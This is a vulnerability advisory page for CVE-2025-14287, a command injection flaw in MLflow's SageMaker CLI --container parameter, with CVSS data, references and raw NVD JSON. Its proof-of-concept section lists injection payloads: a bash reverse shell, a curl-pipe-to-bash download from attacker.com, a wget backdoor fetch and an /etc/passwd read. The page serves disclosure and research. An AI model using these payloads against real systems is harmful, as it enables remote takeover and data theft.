CVE-2025-14287

Description

A command injection vulnerability exists in mlflow/mlflow versions before v3.7.0, specifically in the `mlflow/sagemaker/__init__.py` file at lines 161-167. The vulnerability arises from the direct interpolation of user-supplied container image names into shell commands without proper sanitization, which are then executed using `os.system()`. This allows attackers to execute arbitrary commands by supplying malicious input through the `--container` parameter of the CLI. The issue affects environments where MLflow is used, including development setups, CI/CD pipelines, and cloud deployments.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:lfprojects:mlflow:*:-:*:*:*:*:*:* - VULNERABLE

mlflow < v3.7.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-14287 PoC - MLflow Command Injection
# Affected: mlflow < v3.7.0
# File: mlflow/sagemaker/__init__.py (lines 161-167)

import subprocess
import sys

def exploit_mlflow_container_injection():
    """
    Simulate command injection through --container parameter
    This PoC demonstrates how malicious input can be injected
    """
    # Malicious container name with command injection payload
    malicious_container = "test'; whoami > /tmp/pwned #"
    
    # Simulated vulnerable code execution
    # In real scenario, this would be in mlflow/sagemaker/__init__.py
    vulnerable_cmd = f"docker pull {malicious_container}"
    
    print(f"[+] Vulnerable command: {vulnerable_cmd}")
    print(f"[+] When executed, this will: 1) pull 'test', 2) execute 'whoami', 3) write to /tmp/pwned")
    
    # Alternative payloads:
    payloads = [
        # Reverse shell payload
        "test; bash -i >& /dev/tcp/attacker/port 0>&1 #",
        # File read payload
        "test; cat /etc/passwd #",
        # Download and execute
        "test$(curl http://attacker.com/shell.sh|bash)",
        # Backtick injection
        "test`wget http://attacker.com/backdoor.sh`"
    ]
    
    return vulnerable_cmd

if __name__ == "__main__":
    exploit_mlflow_container_injection()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14287
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14287
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14287/
[4] VulDB https://vuldb.com/cve/CVE-2025-14287
[5] https://huntr.com/bounties/229cd526-41aa-4819-b6f0-e2d0371c89e3

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14287", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:55.610", "lastModified": "2026-04-14T16:48:14.020", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A command injection vulnerability exists in mlflow/mlflow versions before v3.7.0, specifically in the `mlflow/sagemaker/__init__.py` file at lines 161-167. The vulnerability arises from the direct interpolation of user-supplied container image names into shell commands without proper sanitization, which are then executed using `os.system()`. This allows attackers to execute arbitrary commands by supplying malicious input through the `--container` parameter of the CLI. The issue affects environments where MLflow is used, including development setups, CI/CD pipelines, and cloud deployments."}, {"lang": "es", "value": "Una vulnerabilidad de inyección de comandos existe en las versiones de mlflow/mlflow anteriores a la v3.7.0, específicamente en el archivo 'mlflow/sagemaker/__init__.py' en las líneas 161-167. La vulnerabilidad surge de la interpolación directa de nombres de imágenes de contenedores proporcionados por el usuario en comandos de shell sin una sanitización adecuada, los cuales son luego ejecutados usando 'os.system()'. Esto permite a los atacantes ejecutar comandos arbitrarios al proporcionar entrada maliciosa a través del parámetro '--container' de la CLI. El problema afecta a los entornos donde se utiliza MLflow, incluyendo configuraciones de desarrollo, pipelines de CI/CD y despliegues en la nube."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lfprojects:mlflow:*:-:*:*:*:*:*:*", "versionEndExcluding": "3.7.0", "matchCriteriaId": "6067BA6F-1194-4135-AAB5-56C8393D3260"}]}]}], "references": [{"url": "https://huntr.com/bounties/229cd526-41aa-4819-b6f0-e2d0371c89e3", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}